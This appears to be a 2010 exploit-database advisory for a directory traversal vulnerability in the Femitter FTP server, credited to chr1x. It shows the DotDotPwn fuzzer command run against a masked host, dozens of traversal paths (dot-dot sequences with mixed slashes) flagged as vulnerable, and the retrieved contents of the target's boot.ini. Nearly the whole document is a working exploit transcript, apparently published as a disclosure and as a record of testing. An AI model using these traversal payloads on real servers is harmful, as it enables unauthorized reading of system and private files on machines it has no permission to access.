1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 |
# Exploit Title: Fermitter Server FTP Directory Traversal # Date: Nov 06, 2010 # Author: chr1x # Software Link: http://acritum.com/software/dist/fem-dist.exe # Description: Acritum Femitter HTTP-FTP Server is an easy-to use HTTP and FTP server application for Windows which allows you to use your own computer for sharing gigabytes of files with your friends and colleagues. No need to pay for expensive hosting! No need to spend hours to upload your files to a remote server! # Tested on: Windows XP SP3 (Spanish Edition) root@voltron:/dotdotpwn-v2.1# perl dotdotpwn.pl -h XXX.XXX.X.XX -m ftp -t 300 -f boot.ini -s -q -k timeout ################################################################################# # # #CubilFelino Chatsubo # #Security Research Laband[(in)Security Dark] Labs # #chr1x.sectester.net chatsubo-labs.blogspot.com # # # # pr0udly present:# # # #______________________________ # #\______ \____ _/|_\______ \____ _/|_\______ \_____ ____# # ||\/_ \\ __\||\/_ \\ __\| ___/\ \/ \/ //\ # # |<code> \(<_> )|||</code> \(<_> )|||| \ /| |\# #/_______/ \____/ |__| /_______/ \____/ |__||____|\/\_/ |___|/# #\/\/\/ # # - DotDotPwn v2.1 -# # The Traversal Directory Fuzzer# # http://dotdotpwn.sectester.net# #dotdotpwn@sectester.net# # # #by chr1x & nitr0us # ################################################################################# [========== TARGET INFORMATION ==========] [+] Hostname: XXX.XXX.X.XX [+] Protocol: ftp [+] Port: 21 [+] Service detected: 220 Femitter FTP Server ready. [=========== TRAVERSAL ENGINE ===========] [+] Creating Traversal patterns (mix of dots and slashes) [+] Permuting 6 times the traversal patterns (-d switch) [+] Creating the Special Traversal patterns [+] Translating (back)slashes in the filenames [+] Appending 'boot.ini' to the Traversal Strings [+] Including Special sufixes [+] Traversal Engine DONE ! - Total traversal tests created: 1164 [=========== TESTING RESULTS ============] [+] Ready to launch 3.33 traversals per second [+] Press any key to start the testing (You can stop it pressing Ctrl + C) [+] Username: anonymous [+] Password: dot@dot.pwn [+] Connecting to the FTP server at 'XXX.XXX.X.XX' on port 21 [+] FTP Server's Current Path: /C:/Archivos de programa/Femitter/Shared [+] Local Path to download files: /dotdotpwn-v2.1/retrieved_files [+] Press any key to continue [+] Testing ... . [*] GET ../../../boot.ini <- VULNERABLE! [*] GET ../../../../boot.ini <- VULNERABLE! [*] GET ../../../../../boot.ini <- VULNERABLE! [*] GET ../../../../../../boot.ini <- VULNERABLE! [*] GET ..\..\..\boot.ini <- VULNERABLE! [*] GET ..\..\..\..\boot.ini <- VULNERABLE! [*] GET ..\..\..\..\..\boot.ini <- VULNERABLE! [*] GET ..\..\..\..\..\..\boot.ini <- VULNERABLE! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . [*] GET ..//..//..//boot.ini <- VULNERABLE! [*] GET ..//..//..//..//boot.ini <- VULNERABLE! [*] GET ..//..//..//..//..//boot.ini <- VULNERABLE! [*] GET ..//..//..//..//..//..//boot.ini <- VULNERABLE! [*] GET ..///..///..///boot.ini <- VULNERABLE! [*] GET ..///..///..///..///boot.ini <- VULNERABLE! [*] GET ..///..///..///..///..///boot.ini <- VULNERABLE! [*] GET ..///..///..///..///..///..///boot.ini <- VULNERABLE! [*] GET ..\\..\\..\\boot.ini <- VULNERABLE! [*] GET ..\\..\\..\\..\\boot.ini <- VULNERABLE! [*] GET ..\\..\\..\\..\\..\\boot.ini <- VULNERABLE! [*] GET ..\\..\\..\\..\\..\\..\\boot.ini <- VULNERABLE! [*] GET ..\\\..\\\..\\\boot.ini <- VULNERABLE! [*] GET ..\\\..\\\..\\\..\\\boot.ini <- VULNERABLE! [*] GET ..\\\..\\\..\\\..\\\..\\\boot.ini <- VULNERABLE! [*] GET ..\\\..\\\..\\\..\\\..\\\..\\\boot.ini <- VULNERABLE! . [*] GET ../\../\../\boot.ini <- VULNERABLE! [*] GET ../\../\../\../\boot.ini <- VULNERABLE! [*] GET ../\../\../\../\../\boot.ini <- VULNERABLE! [*] GET ../\../\../\../\../\../\boot.ini <- VULNERABLE! [*] GET ..\/..\/..\/boot.ini <- VULNERABLE! [*] GET ..\/..\/..\/..\/boot.ini <- VULNERABLE! [*] GET ..\/..\/..\/..\/..\/boot.ini <- VULNERABLE! [*] GET ..\/..\/..\/..\/..\/..\/boot.ini <- VULNERABLE! [*] GET ../\/../\/../\/boot.ini <- VULNERABLE! [*] GET ../\/../\/../\/../\/boot.ini <- VULNERABLE! [*] GET ../\/../\/../\/../\/../\/boot.ini <- VULNERABLE! [*] GET ../\/../\/../\/../\/../\/../\/boot.ini <- VULNERABLE! [*] GET ..\/\..\/\..\/\boot.ini <- VULNERABLE! [*] GET ..\/\..\/\..\/\..\/\boot.ini <- VULNERABLE! [*] GET ..\/\..\/\..\/\..\/\..\/\boot.ini <- VULNERABLE! [*] GET ..\/\..\/\..\/\..\/\..\/\..\/\boot.ini <- VULNERABLE! [*] GET \../\../\../boot.ini <- VULNERABLE! [*] GET \../\../\../\../boot.ini <- VULNERABLE! [*] GET \../\../\../\../\../boot.ini <- VULNERABLE! [*] GET \../\../\../\../\../\../boot.ini <- VULNERABLE! . [*] GET /..\/..\/..\boot.ini <- VULNERABLE! [*] GET /..\/..\/..\/..\boot.ini <- VULNERABLE! [*] GET /..\/..\/..\/..\/..\boot.ini <- VULNERABLE! [*] GET /..\/..\/..\/..\/..\/..\boot.ini <- VULNERABLE! . [*] GET ./.././.././../boot.ini <- VULNERABLE! [*] GET ./.././.././.././../boot.ini <- VULNERABLE! [*] GET ./.././.././.././.././../boot.ini <- VULNERABLE! [*] GET ./.././.././.././.././.././../boot.ini <- VULNERABLE! [*] GET .\..\.\..\.\..\boot.ini <- VULNERABLE! [*] GET .\..\.\..\.\..\.\..\boot.ini <- VULNERABLE! [*] GET .\..\.\..\.\..\.\..\.\..\boot.ini <- VULNERABLE! [*] GET .\..\.\..\.\..\.\..\.\..\.\..\boot.ini <- VULNERABLE! [*] GET .//..//.//..//.//..//boot.ini <- VULNERABLE! [*] GET .//..//.//..//.//..//.//..//boot.ini <- VULNERABLE! [*] GET .//..//.//..//.//..//.//..//.//..//boot.ini <- VULNERABLE! [*] GET .//..//.//..//.//..//.//..//.//..//.//..//boot.ini <- VULNERABLE! . [*] GET .\\..\\.\\..\\.\\..\\boot.ini <- VULNERABLE! [*] GET .\\..\\.\\..\\.\\..\\.\\..\\boot.ini <- VULNERABLE! [*] GET .\\..\\.\\..\\.\\..\\.\\..\\.\\..\\boot.ini <- VULNERABLE! [*] GET .\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\boot.ini <- VULNERABLE! . . . . . . . . . . [+] Fuzz testing finished after 6.13 minutes (368 seconds) [+] Total Traversals found: 64 root@voltron:/dotdotpwn-v2.1# cat ./retrieved_files/boot.ini [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect root@voltron:/dotdotpwn-v2.1# |